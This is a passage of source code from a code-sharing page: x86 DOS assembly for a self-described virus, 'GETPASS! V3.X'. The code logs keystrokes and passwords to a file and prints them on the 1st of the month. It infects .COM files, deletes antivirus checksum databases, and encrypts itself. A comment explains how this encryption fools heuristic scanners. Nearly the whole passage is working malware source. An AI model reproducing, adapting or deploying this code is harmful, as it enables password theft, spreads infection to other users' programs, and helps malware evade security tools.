📄 getpass!.asm
字号:
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
MOV AL,LF ;
JMP BACK ;
OVER_2: MOV AL,CR ;CR into AL.
MOV BYTE PTR[CS:0100+KBUFF+BX],AL;Copy CR into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
CALL WFILE ;Write buffer to the logfile.
MOV BYTE PTR[CS:0100+KFLAG],00h;
MOV WORD PTR[CS:0100+KPTR],00h;
JMP RESREGS ;Restore registers.
WFILE: PUSH AX ;\
PUSH BX ;
PUSH DX ; Save registers.
PUSH CX ;
PUSH DS ;/
PUSH CS ;\ Get Data segment on address.
POP DS ;/
MOV AX,3D02h ;Open file function.
MOV DX,OFFSET[CS:0100+FN] ;Offset file spec.
INT 21h ;Call DOS.
JC FAILURE ;On error, quit.
XCHG BX,AX ;Into BX.
MOV AX,4202h ;Mov file handle to EOF.
XOR CX,CX ;CX=0
XOR DX,DX ;DX=0
INT 21h ;Call DOS.
CMP AX,2000h ;File on max lenght?
JGE FAILURE ;If so, exit.
WRITE: MOV CX,CS:[0100+KPTR] ;BX = keyboard pointer.
ADD CX,03h ;+3.
MOV DX,OFFSET CS:[0100+KBUFF];Offset keyboard buffer.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
FCLOSE: MOV AH,3Eh ;Close file funtion.
INT 21h ;Call DOS.
FAILURE:POP DS ;\
POP DX ;
POP CX ; Restore registers.
POP BX ;
POP AX ;/
RET ;Return to caller.
;-----------------------------------------------------------------------------
NINT21: DW 0 ;- Original INT 21 vector.
DW 0 ;/
NINT16: DW 0 ;- Original INT 16 vector.
DW 0 ;/
KEYBUFF DB 1dh DUP (?) ;Keyboard buffer.
LASTBYT:DB 0 ;Last Resident Byte.
;-----------------------------------------------------------------------------
ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];Offset in DTA.
MOV AX,4300h ;Ask file attributes.
INT 21h ;Call DOS.
LEA BX,[BP+OFFSET ATTR] ;Save address for old attributes.
MOV [BX],CX ;Save it.
XOR CX,CX ;Clear file attributes.
MOV AX,4301h ;Write file attributes.
INT 21h ;Call DOS.
JNC OK ;No error, proceed.
CALL EXIT ;Oh Oh, error occured. Quit.
OK: RET ;Return to caller.
;-----------------------------------------------------------------------------
RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
LEA BX,[BP+OFFSET ATTR] ;Offset address old attributes.
MOV CX,[BX] ;Into CX.
MOV AX,4301h ;Write old values back.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];Offset directory spec.
MOV AH,3Bh ;Goto the directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RANDOM: CALL CHKTIME ;Get system time.
MOV CX,0 ;Figure this out by yourself.
MOV AX,100d ;It is a random generator with
OK_19: INC CX ;two variable inputs.
SUB AX,BX ;A: How many dir's in the path.
CMP AX,01d ;B: Random system time. (jiffies)
JGE OK_19 ;With this values, we create a
XOR BX,BX ;random value between 1 and A.
OK_20: INC BX ;
SUB DL,CL ;
CMP DL,01d ;
JGE OK_20 ;
MOV BYTE PTR[BP+OFFSET VAL_2],BL;Save value.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BEGIN1: PUSH SP ;
POP BX ;Everything is related to BP.
MOV BP,WORD PTR[BX] ;
SUB BP,10Fh ;In first run BP=0
RET ;
;-----------------------------------------------------------------------------
NEWINT: MOV AL,03h ;New INT 24.
IRET ;No more write protect errors!
;-----------------------------------------------------------------------------
TIMER: PUSH DS ;Save data segment.
MOV AX,0044h ;\
MOV DS,AX ;- DS=resident segment.
CMP BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;Restore data segment.
JE NOPRINT ;Yes, once is enough.
MOV AH,2Ah ;Get system date.
INT 21h ;Call DOS.
CMP DL,01h ;Is it the 1st of the month?
JNE NOPRINT ;Nope, don't print the passwords.
MOV AX,3D01h ;Open device PRN (printer)
LEA DX,[BP+OFFSET PRINT] ;Offset spec.
INT 21h ;Call DOS.
MOV DI,AX ;Save handle.
MOV AX,3D00h ;Open Password file.
LEA DX,[BP+OFFSET FNAME] ;File spec.
INT 21h ;Call DOS.
MOV SI,AX ;Save handle.
GOPRINT:MOV AH,3Fh ;Read file function.
MOV BX,SI ;File handle into BX.
MOV CX,01h ;Read one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Into this address.
INT 21h ;Call DOS.
CMP AL,0 ;EOF?
JE READY ;If equal, ready.
MOV AH,40h ;Write to file function.
MOV BX,DI ;File handle into BX.
MOV CX,01h ;Write one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Offset output.
INT 21h ;Call DOS.
JMP GOPRINT ;Next byte.
READY: MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
PUSH DS ;
MOV AX,0044h ;
mov DS,AX ;Restore data segment.
MOV BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;
NOPRINT:RET ;Return to caller.
;-----------------------------------------------------------------------------
INSTSR2:LEA DI,[BP+OFFSET NEW_DTA+0100h];/
LEA SI,[BP+OFFSET INFECT] ;Offset address infection routine.
MOV CX,TSR2LEN ;Length to install.
REP MOVSB ;Install it.
MOV AX,25D0h ;Give up new INT D0 vector.
LEA DX,[BP+OFFSET NEW_DTA+0100h];
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
PRINT DB 'PRN',0 ;Device=printer.
PATH DB 'PATH=' ;Used to find environment.
SPEC DB '*.COM',0 ;File search specification.
TXT DB '.TXT',0 ;Rename file specification.
OUTPUT DB 0 ;Output byte to printer.
TXTPOI DW 0 ;Pointer in specification.
MARK1 DB 0 ;Used for infection check.
VAL_2 DB 0 ;Random value for directory switching.
OLDRV DB 0 ;Old drive code.
BYTES DB 'TBDRVX',0 ;
COMMND DB 'COMM',0 ;
MICRO DB 'CHKLIST.MS',0 ;- Files to be deleted.
CENTRAL DB 'CHKLIST.CPS',0 ;/
TBAV DB 'ANTI-VIR.DAT',0 ;/
VIRNAME DB 'GETPASS! V3.X',0 ;
BEGIN2 DW 0 ;
NWJMP1 DB 0EBh,0 ;
FLAGT DB 0 ;
OLD_DTA DW 0 ;Old DTA addres.
HANDLE DW 0 ;File handle.
TIME DB 2 DUP (?) ;File time.
DATE DB 2 DUP (?) ;File date.
ATTR DB 1 DUP (?),0 ;Attributes.
NEWJMP DB 0E9h,0,0 ;Jump replacement.
ORIGNL DB 0CDh,020h,090h ;Original instrucitons.
DEXIT DB 0CDh,020h,090h ;Dummy exit instructions.
NEWNAM DB 0Dh DUP (?) ;New file name.
OLDINT DW 0 ;Old INT 24 vector.
NP DW ? ;New DTA address.
;-----------------------------------------------------------------------------
INFECT: PUSH BX ;Save file handle.
PUSH DX ;Save encryption key.
PUSH BX ;Save file handle.
CALL ENCRYPT ;Encrypt the virus code.
POP BX ;Restore file handle.
LEA DX,[BP+OFFSET VSTART] ;Begin here.
MOV CX,VIRLEN ;Write this many Bytes.
MOV AH,40h ;Write to file.
INT 21h ;Call DOS.
POP DX ;Restore encryption value.
CALL ENCRYPT ;Fix up the mess.
POP BX ;Restore file handle.
DUMMY: IRET ;Return to caller.
;-----------------------------------------------------------------------------
CREATE: MOV AH,5Bh ;Create file function.
LEA DX,[BP+OFFSET FNAME] ;Offset file spec.
MOV CX,0 ;Normal attributes.
INT 21h ;Call DOS.
JC EXISTS ;File already excists, do the rest.
XCHG AX,BX ;File handle into BX.
MOV CX,INTRO ;Lenght of intro.
LEA DX,[BP+OFFSET INAME] ;Offset text.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
EXISTS: RET ;Return to caller.
INAME: DB 'You are now looking at the name/passwords of '
DB 'your network! ',CR,LF
DB 'Greetings, ThE wEiRd GeNiUs.',CR,LF
DB 'Check your MSD.INI once in a while!',CR,LF,CR,LF
LBIT: DB 0
;-----------------------------------------------------------------------------
;Comment: From here the code remains UN-encrypted.
;-----------------------------------------------------------------------------
CHKTIME:MOV AH,2Ch ;Get system time.
INT 21h ;Call DOS.
CMP DL,0 ;If zero,
JE CHKTIME ;try again.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDOS: MOV AH,30h ;Get DOS version.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VAL_1 DB 00h ;Encryption Value.
;-----------------------------------------------------------------------------
;Encrypting the virus code is not longer the most important thing to do since
;some of the anti-viral software can decrypt and trace the virus code in a
;simulated way. The en/de-cryption routine is almost the only piece of
;code that stays readable and if it is not a polymorphic virus this code
;always stays the same. The only way we can misguide a heuristic
;scanner is to 'tell' it that we are a normal, respectable program. By first
;performing a set of 'normal' instructions we mislead the scanner until it
;stops tracing the program. The result is that the en/decryption routine is
;not discovered. Since there are no other suspicious instructions in the code
;we remain under cover. This is why I used a very simple encryption method.
;-----------------------------------------------------------------------------
ENCRYP: CALL NEXTL ;-Get BP on address.
NEXTL: POP BX ;/
SUB BX,04 ;[BX]=decryption key.
MOV DL,[BX] ;DL=[BX]
SUB BX,LENGTH ;BX=begin of encrypted code.
CMP DL,0 ;Code Encrypted?
JE NOTENC ;Nope
JMP DECRYPT ;Decrypt.
ENCRYPT:LEA BX,[BP+OFFSET CSTART] ;De/en-crypt from here.
DECRYPT:MOV DH,DL ;
MOV CX,CRYPTLEN ;Set counter.
X_LOOP: XOR [BX],DL ;Xor the code on address BX.
SUB DL,DH ;-To change form of scrambled code.
SUB DH,02Eh ;/
INC BX ;Increase address.
LOOP X_LOOP ;Repeat until done.
NOTENC: RET ;Return to caller.
;-----------------------------------------------------------------------------
BUFFER: DB 64 DUP (?) ;Here we store directory info.
;-----------------------------------------------------------------------------
NEW_DTA: ;Here we put the DTA copy.
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -